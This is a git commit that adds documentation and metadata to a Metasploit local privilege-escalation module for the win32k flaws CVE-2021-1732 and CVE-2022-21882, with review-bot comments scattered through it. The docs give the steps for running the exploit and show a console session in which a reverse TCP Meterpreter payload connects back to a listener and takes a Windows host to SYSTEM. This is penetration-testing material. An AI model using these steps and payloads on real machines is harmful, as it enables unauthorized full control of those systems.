Write up the module metadata and docs

This commit is contained in:
Spencer McIntyre 2022-02-18 14:42:41 -05:00
parent d92259f868
commit bcd7cb1122
2 changed files with 124 additions and 9 deletions

@ -0,0 +1,86 @@
## Vulnerable Application
A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
achieve an out of bounds write operation, eventually leading to privilege escalation.
This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
function on a wider range of Windows 10 targets.
Windows 10 builds 17134 (v1803) through 19041 (v20H1) will use the original technique from CVE-2021-1732, leveraging
`user32!CreateWindowEx` to trigger the `xxxClientAllocWindowClassExtraBytes` hook and corrupt the target window. Windows
10 builds 19042 (v20H2) through 19044 (v21H2) will use the updated technique from CVE-2022-21882, leveraging
`win32u!NtUserMessageCall` to trigger the `xxxClientAllocWindowClassExtraBytes` hook for the same effect.
### Installation And Setup
Windows 10 versions 1803 through 21H2 (without the patch) are vulnerable out of the box. This exploit module has been
tested on Windows 10 versions 1803, 1909, 20H1, 20H2 and 21H2.
## Verification Steps
1. Start msfconsole
1. Get a Meterpreter session on a vulnerable host
1. Do: `use exploit/windows/local/cve_2022_21882_win32k`
1. Set the `SESSION` and `PAYLOAD` options
1. Do: `run`
1. You should get a shell.
## Scenarios
### Windows 10 Version 21H2 Build 19044.1288 x64
```
msf6 exploit(windows/local/cve_2022_21882_win32k) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: DESKTOP-SRAQBLH\smcintyre
meterpreter > sysinfo
Computer : DESKTOP-SRAQBLH
OS : Windows 10 (10.0 Build 19044).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getsystem
[-] stdapi_sys_config_getuid: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/local/cve_2022_21882_win32k) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/cve_2022_21882_win32k) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2022_21882_win32k) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/local/cve_2022_21882_win32k) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Launching netsh to host the DLL...
[+] Process 6840 launched.
[*] Reflectively injecting the DLL into 6840...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 192.168.159.87
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.87:52622 ) at 2022-02-18 14:34:00 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-SRAQBLH
OS : Windows 10 (10.0 Build 19044).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter >
```
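Review bot: the new documentation file duplicates "is" across a line break in the Vulnerable Application section ("The root cause is / is the same for both vulnerabilities"); drop one of them. The Installation And Setup section should also state that only 64-bit Windows 10 is supported, since the module's single target is 'Windows 10 v1803-21H2 x64' with 'Arch' => [ ARCH_X64 ]; as written, "Windows 10 versions 1803 through 21H2 (without the patch) are vulnerable out of the box" reads as though 32-bit builds are covered by the module as well.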

@ -12,18 +12,39 @@ class MetasploitModule < Msf::Exploit::Local
include Msf::Post::Windows::ReflectiveDLLInjection
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Deprecated
moved_from 'exploit/windows/local/cve_2021_1732_win32k'
def initialize(info = {})
super(
update_info(
info,
{
'Name' => '',
'Name' => 'Win32k ConsoleControl Offset Confusion',
'Description' => %q{
A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of
NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being
treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to
achieve an out of bounds write operation, eventually leading to privilege escalation.
This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
function on a wider range of Windows 10 targets.
},
'License' => MSF_LICENSE,
'Author' => [
# CVE-2021-1732
'BITTER APT', # exploit as used in the wild
'JinQuan', # detailed analysis
'MaDongZe', # detailed analysis
'TuXiaoYi', # detailed analysis
'LiHao', # detailed analysis
# CVE-2022-21882
'L4ys', # github poc
'KaLendsi', # github poc
# both CVEs
'KaLendsi', # github pocs
# Metasploit exploit
'Spencer McIntyre' # metasploit module
],
'Arch' => [ ARCH_X64 ],
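Review bot: the module 'Description' carries the same duplicated word as the docs ("The root cause is / is the same"); fix it here too so the two texts stay identical. In the 'Author' list, 'KaLendsi' appears once under the "# CVE-2022-21882" comment and again under "# both CVEs"; only the "both CVEs" entry (with the "github pocs" comment) should remain so the same name is not credited twice.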
@ -33,26 +54,34 @@ class MetasploitModule < Msf::Exploit::Local
'EXITFUNC' => 'thread'
},
'Targets' => [
[ 'Windows 10 v20H2-21H2 x64', { 'Arch' => ARCH_X64 } ]
[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]
],
'Payload' => {
'DisableNops' => true
},
'References' => [
# CVE-2021-1732 references
[ 'CVE', '2021-1732' ],
[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],
# CVE-2022-21882 references
[ 'CVE', '2022-21882' ],
[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],
[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]
],
'DisclosureDate' => '',
'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_OS_RESTARTS, ],
'Reliability' => [ REPEATABLE_SESSION, ],
'SideEffects' => [],
'RelatedModules' => [
# this module exploits the original vulnerability for which this is a patch bypass
'exploit/windows/local/cve_2021_1732_win32k'
]
'SideEffects' => []
}
}
)
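Review bot: the 'RelatedModules' entry points at 'exploit/windows/local/cve_2021_1732_win32k', which this same file declares as its own former path via moved_from (the old module name is now a deprecated alias for this one), so the note is self-referential; either remove it or point it at a genuinely separate module. If the entry is kept, the closing ']' of the 'RelatedModules' array needs a trailing comma before the next key, and the final 'Notes' hash must contain only one 'SideEffects' => [] key.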